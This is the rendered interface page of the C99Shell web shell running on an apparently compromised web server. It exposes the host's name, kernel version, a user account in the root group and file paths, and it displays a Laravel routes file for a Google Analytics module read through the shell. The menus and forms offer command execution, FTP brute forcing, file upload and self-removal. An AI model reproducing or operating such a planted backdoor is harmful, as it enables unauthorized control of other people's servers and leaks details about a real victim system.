!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/GoogleAnalytics/Routes/   drwxr-xr-x
Free 26.47 GB of 117.98 GB (22.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     web.php (1.85 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

use Illuminate\Support\Facades\Route;
use 
Modules\GoogleAnalytics\Http\Controllers\{
    
GoogleAnalyticsController,
    
GoogleAnalyticsSettingController
};

Route::group(['prefix' => 'admin''middleware' => ['auth''locale''permission']], function () {

    
Route::get('analytics-dashboard', [GoogleAnalyticsController::class, 'dashboard'])->name('analytics.dashboard');
    
Route::get('top-visited-pages', [GoogleAnalyticsController::class, 'topVisitedPage'])->name('top.visited.page');
    
Route::get('most-visited-country', [GoogleAnalyticsController::class, 'mostVisitedCountry'])->name('most.visited.country');

    
Route::get('analytics-settings', [GoogleAnalyticsSettingController::class, 'settings'])->name('analytics.settings');
    
Route::post('analytics-settings', [GoogleAnalyticsSettingController::class, 'settingsStore'])->middleware(['checkForDemoMode'])->name('analytics.settings.store');

    
Route::get('audience', [GoogleAnalyticsController::class, 'audience'])->name('audience');
    
Route::get('location', [GoogleAnalyticsController::class, 'location'])->name('location');
    
Route::get('page_view', [GoogleAnalyticsController::class, 'pageView'])->name('page_view');
    
Route::get('visitor', [GoogleAnalyticsController::class, 'visitor'])->name('visitor');
    
Route::get('device', [GoogleAnalyticsController::class, 'device'])->name('device');
    
Route::get('active_user', [GoogleAnalyticsController::class, 'user'])->name('active_user');
});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--